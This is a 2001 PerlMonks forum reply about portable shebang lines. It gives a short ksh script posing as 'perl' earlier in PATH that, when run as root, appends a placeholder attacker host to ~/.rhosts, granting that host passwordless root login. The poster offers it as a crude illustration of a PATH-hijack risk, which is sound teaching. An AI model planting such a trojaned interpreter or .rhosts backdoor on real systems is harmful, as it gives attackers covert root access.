Beefy Boxes and Bandwidth Generously Provided by pair Networks
There's more than one way to do things
 
PerlMonks  

Just an example...

by Rhose (Priest)
on Oct 12, 2001 at 18:07 UTC ( [id://118480]=note: print w/replies, xml ) Need Help??


in reply to Re: Portable Shebang
in thread Portable Shebang

Just a quick HP-UX example... name your script perl and place it in any directory located in the PATH *before* the actual perl. 

#!/usr/bin/ksh
if [ `/usr/bin/whoami` = root ]; then
  /usr/bin/chmod 600 ${HOME}/.rhosts
  /usr/bin/echo myhackerpcname >> ${HOME}/.rhosts
fi
/usr/bin/perl $@

[download]

A couple of notes:

  1. This is a VERY crude example, and is to illustrate Masem's general security point
  2. "myhackerpcname" is the name of the hacker's PC
  3. A true hacker would use something a LOT less obvious than this script -- it leaves fingerprints all over the place, and could easily trip a security sweep checking the .rhosts files. This script is more likely to be an internal breach by a less skilled attacker.
  4. If, however, a root account were to execute a perl script with #!perl, the system's security would be compromised -- well, anyone logged into "myhackerpcname" as root could log into the compomised system as root without using a password.

Update:

  • Corrected some typos.
  • Changed the file permissions a bit -- made them a little more correct. (Suggestions made by blyman)

In Section Seekers of Perl Wisdom

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?

www.com | www.net | www.org
Node Status?
node history
Node Type: note [id://118480]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others imbibing at the Monastery: (8)
As of 2024-04-18 17:03 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found